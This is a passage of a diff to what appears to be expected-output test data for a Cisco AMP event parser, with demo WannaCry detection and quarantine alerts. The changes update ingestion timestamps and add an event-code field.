                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419229331435815000",
@@ -103,8 +104,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513657497Z",
+                "ingested": "2021-09-30T00:15:28.103716854Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419229331435815000",
@@ -178,8 +180,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513659380Z",
+                "ingested": "2021-09-30T00:15:28.103719085Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419229331435815000",
@@ -253,8 +256,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513661186Z",
+                "ingested": "2021-09-30T00:15:28.103721187Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419229331435815000",
@@ -328,8 +332,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513662947Z",
+                "ingested": "2021-09-30T00:15:28.103723229Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419229331435815000",
@@ -403,8 +408,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513664682Z",
+                "ingested": "2021-09-30T00:15:28.103725271Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419229331435815000",
@@ -490,8 +496,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513666408Z",
+                "ingested": "2021-09-30T00:15:28.103727348Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229331435815000",
@@ -586,8 +593,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513668119Z",
+                "ingested": "2021-09-30T00:15:28.103729393Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229331435815000",
@@ -675,8 +683,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513669865Z",
+                "ingested": "2021-09-30T00:15:28.103731430Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":73000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229331435815000",
@@ -760,8 +769,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513671602Z",
+                "ingested": "2021-09-30T00:15:28.103733483Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":26000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814968\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229331435815000",
@@ -833,8 +843,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513673328Z",
+                "ingested": "2021-09-30T00:15:28.103735553Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847660\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419229331435815000",
@@ -904,8 +915,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513675248Z",
+                "ingested": "2021-09-30T00:15:28.103737757Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419229331435815000",
@@ -975,8 +987,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513676958Z",
+                "ingested": "2021-09-30T00:15:28.103739790Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419229331435815000",
@@ -1058,8 +1071,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513678727Z",
+                "ingested": "2021-09-30T00:15:28.103741830Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229327140848000",
@@ -1156,8 +1170,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513680440Z",
+                "ingested": "2021-09-30T00:15:28.103743884Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229327140848000",
@@ -1256,8 +1271,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513682171Z",
+                "ingested": "2021-09-30T00:15:28.103745931Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419229327140848000",
@@ -1354,8 +1370,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:13.513692566Z",
+                "ingested": "2021-09-30T00:15:28.103748099Z",
